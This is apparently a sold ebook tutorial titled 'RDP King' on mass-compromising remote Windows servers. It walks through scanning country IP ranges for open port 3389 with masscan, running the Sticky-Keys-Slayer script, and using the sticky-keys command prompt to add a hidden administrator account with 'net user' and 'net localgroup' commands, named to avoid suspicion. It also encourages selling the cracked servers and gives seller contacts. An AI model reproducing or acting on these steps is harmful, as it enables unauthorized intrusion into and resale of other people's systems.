RDP King [PDF]

Zitiervorschau

DISCORD SUPPORT ➤ PunchMan#1250

INTRODUCTION Hello and thank you for your purchase !

Welcome to RDP KING.

By doing this tutorial step by step you will learn : ➜ How to find potentially vulnerable RDP’s using powerful script. ➜ How to make you owner of the RDP’s. ➜ How does the script work ? ➜ How you can use the servers you will crack.

Before we start I want to make sure that you know some server-related words: ➜ VPS: Virtual Private Server, it's basically a private server that runs inside a “dedicated” (normal) server. It is a virtual environment, like a Virtual Machine. ➜ RDP: Remote Desktop Protocol, it’s the protocol we use to connect to Windows VPSs, we also call RDP a Windows VPS itself. Now, let’s talk about the OS and software we are going to use. I recommend using a Windows and a Linux environment (like Kali Linux). If you are using Windows, as many users do, you can easily install a Kali Linux Virtual Machine on your Windows PC. (It is recommended to use a standalone windows OS, instead) You can quickly create a Virtual Machine with the help of Google or following guides from YouTube. Example : https://www.youtube.com/watch?v=SVyWeQTtHu8

HOW DOES THE SCRIPT WORK? The script we are going to use is entirely based on a kind of bug/exploit: some servers make the cmd pop up when we press the shift button 5 times, without the need of logging in. This let us become the administrator of the machine, so that we can create a new user and give him the full admin permissions.. This also means that the real owner of the RDP cannot see what we are running on the machine

COLLECTING THE IP ADDRESSES: MASSCAN The first step to start cracking RDPs consist in finding IP addresses with port 3389 OPEN. The fastest way to do that is collecting IP ranges and then finding which ones have port 3389 open. In this guide we are going to use masscan, but you can use another program, masscan is just the tool I always use and I think it’s the fastest port scanner. If you are going to run Masscan on a RDP just be aware that some companies does not allow to run such a program on their servers and this might result in a ban.

1) Download and install on Windows the latest version of WinPCap (https://www.winpcap.org/) 2) Download Masscan GUI https://mega.nz/#!JEU2nS6K!28_fQv9LVfcEzXCyhohft-xOsE4JUutPV9W7QtSe5Y (95% it’s not infected, but just a false positive, you can run it sandboxed to be 100% safe) 3) Go to http://services.ce3c.be/ciprg/ and put desired country then click « Generate » (see picture below)

4) Copy a bunch of lines that the website has generated (see picture below)

5) Open masscan and and make it look like this the lines in the black box (Format example : 2.0.0.0-255.240.0.0)

6) Change the target port to 3389 and (if you have a good connection) you can set a greater number of threads.

7) Wait until masscan ends or until you have collected some thousands of IPs (10000+ recommended) 8) After gathering the needed IPs you can stop masscan (ctrl+c to stop the running scan) 9) Now you can click the “open results” button and enjoy your txt file with all the IPs! Otherwise you can also open the txt file from the masscan directory.

MOVING THE IP’s TO KALI LINUX Once you have your txt file ready with the IPs we need to move the file from windows to the Linux environment. The file must contain 1 IP each line, if your file does not you can easily extract the IP’s using this site: http://www.toolsvoid.com/extract-ip-addresses

The easiest way to move the file is uploading it on https://anonfile.com/ and then downloading the file in the Linux environment (using the download link that anonfile gives you)

Keep in mind the location of the txt file containing the IP’s.

SETTING UP THE SCRIPT Before running the cracking script you will need to download and install some application and modules, to make sure that everything will work without error messages. Open the Kali Linux terminal and run these commands. Sometimes you need to enter “y” to continue. (root permissions needed):

apt-get update apt-get -y install imagemagick xdotool parallel bc apt-get install rdesktop git

DOWNLOADING AND RUNNING THE SCRIPT To clone (clone=download) the script run the following command, it is recommended to clone the script in the root directory (=main directory). Run this command to clone the script:

git clone https://github.com/linuz/Sticky-Keys-Slayer.git Now, a directory called “Sticky-Keys-Slayer” has been created. To enter that directory we use the command:

cd Sticky-Keys-Slayer Before Starting to run the script you will need to put in that directory the txt file containing the IP’s we have found using masscan, an easy way to do that is opening the file explorer and copying the txt file and pasting in the Sticky-Keys-Slayer directory. Let’s suppose that you called the IPs file IPs.txt Run in the terminal the command:

./stickyKeysSlayer.sh -v -j8 -t 10 IPs.txt Where IP’s.txt is the name of the file containing the IPs. Here is a sample picture:

The script will now be running and you will see some rdesktop tabs popping up. Note that you should not use the PC while the script is running, but if you setup everything on Virtual Machine you can still use it like before.

FINDING OUT VULNERABLE RDP’s When the script ends, or when it gets aborted, it’s time to find out which RDP’s are vulnerable, here is how to do it. In the Sticky-Keys-Slayer slayer directory you will find a folder called “screenshots”; it contains a screenshot for every RDP you have scanned, inside the screenshot folder there will be another folder called “discovered”. It contains the screenshot of the vulnerable RDPs.

Some of them are false positives but if the screenshot show the CMD it’s probably a good result. Here is an example:

CREATING A NEW USER Before creating new users with admin permissions on vulnerable servers I have to warn you that if the following commands do not work on a server you are trying to crack it is likely that the server is not exploitable and there is nothing you can do.

As mentioned before, the “discovered” folder contains all the server that show a cmd, open that folder to know the IP addresses of those servers. The IP address is written in the file name of the screenshot and at the top of the screenshot itself.

Now, open the terminal and execute this command to try to connect to a “discovered” RDP.

rdesktop [ip address of vulnerable server] You will see a rdesktop tab opening. On that rdesktop tab try to press the SHIFT button 5 times, you will probably see the cmd appearing, however in some cases you need to press shift 6+ times.

If you pressed shift and nothing happens probably the server you are trying to crack is not exploitable, it’s just a false positive.

If the cmd opens up correctly run this command to create a new user:

net user /add [username] [password] Where [username] is the username you choose, I strongly recommend to use a name like “System” or “Windows” or “Other User” to avoid being suspicious. You can choose whatever you want as password, just make sure not to forget it! Write it down somewhere, and easy way to identify cracked servers is [username]@[IP];[password] like [email protected];U4G8

Now to give your account full administrator functions run this command:

net localgroup Administrators [username] /add Your have successfully managed to create a new admin user so you have finally cracked the server, to login use the [IP] and the [username] and [password] you just chose.

Obviously you will now have to repeat this steps for every server you find in the “discovered” folder.

CONCLUSIONS I have taught you this advanced and private method to crack RDP’s, if you have some question I can do my best to help you, add me on Discord : PunchMan#1250

With this advanced script you can crack about 3-15 servers every day just by running it overnight.

You can do almost everything on the cracked servers, but if you use a lot of system resources it’s possible that your server will be banned.

The hardaware specs of the servers you crack are kind of random, there is no way to predict how good/bad the server you are going to crack will be; also the Windows version is random, you will usually find Windows 2003-XP-2008- 7-2012

A great way to make money with these servers is selling them, I made a decent amount of money selling servers, but of course you need to restock your shop regularry and this takes time. Cracked servers are often good for cracking, too. Here are some proof from my Selly.gg :

I really hope this book has helped you, good cracking! THIS EBOOK IS ONLY SOLD BY WHITEDEV AT : https://shoppy.gg/@WhiteDEV